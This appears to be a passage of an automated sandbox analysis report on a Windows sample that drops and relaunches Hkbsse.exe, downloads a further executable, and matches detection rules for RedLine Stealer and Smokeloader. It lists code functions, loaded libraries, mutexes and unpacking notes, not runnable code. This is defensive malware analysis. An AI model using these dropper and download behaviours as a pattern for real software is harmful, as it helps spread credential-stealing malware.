Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A9D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004470E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00443248
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004262A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00421712
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044783B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044795B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00448900
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404B90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404D90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00442DB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00437F63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00423F01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00420F23
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044E6509
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04503017
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044E4168
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044F81CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044E118A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04507350
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044C4DF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044C4FF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044E1979
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04507AA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04508B67
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04507BC2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_004099D0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_004470E9
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00443248
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_004262A2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00421712
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_0044783B
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_0044795B
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00448900
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00404B90
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00404D90
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00442DB0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00437F63
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00423F01
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_00420F23
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044A6509
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044C3017
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044A4168
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044B81CA
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044A118A
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044C7350
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_04484DF7
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_04484FF7
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044A1979
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044C7AA2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044C8B67
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044C7BC2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0040E4E0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_004262A2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00448900
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00404B90
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00404D90
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00442DB0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00420F23
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_004470E9
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00443248
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00421712
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0044783B
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0044795B
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00437F63
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_00423F01
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04536509
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04553017
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04534168
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_045481CA
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0453118A
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04557350
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04514DF7
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04514FF7
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04531979
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04557AA2
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04558B67
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_04557BC2
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 044DE2F7 appears 38 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0041E090 appears 43 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00418110 appears 129 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 044DDCB9 appears 68 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0041DA52 appears 76 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 044D8377 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0041E090 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 00418110 appears 258 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0452DCB9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 04528377 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0041D773 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0041D75E appears 61 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 04498377 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0452D9C5 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0449DCB9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0041DA52 appears 163 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0452E2F7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0041C1F9 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 00417A50 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 00438EB3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: String function: 0449E2F7 appears 38 times
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
Source: file.exe, 00000000.00000002.2275577797.0000000002A1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesOtlasik0 vs file.exe
Source: file.exe, 00000000.00000000.2115109806.000000000284E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesOtlasik0 vs file.exe
Source: file.exe, 00000000.00000003.2210480732.00000000065EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesOtlasik0 vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenamesOtlasik0 vs file.exe
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Hkbsse.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.33.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9f93a2.33.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/66@1/4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0296036E CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Mutant created: \Sessions\1\BaseNamedObjects\5ebdeb3f981e7577724a336321b324eb
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1924
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3916
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\3bca58cece
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe -- Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Unpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Unpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exe -- Unpacked PE file: 0.2.file.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Unpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Unpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_0042C0A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042C0A9
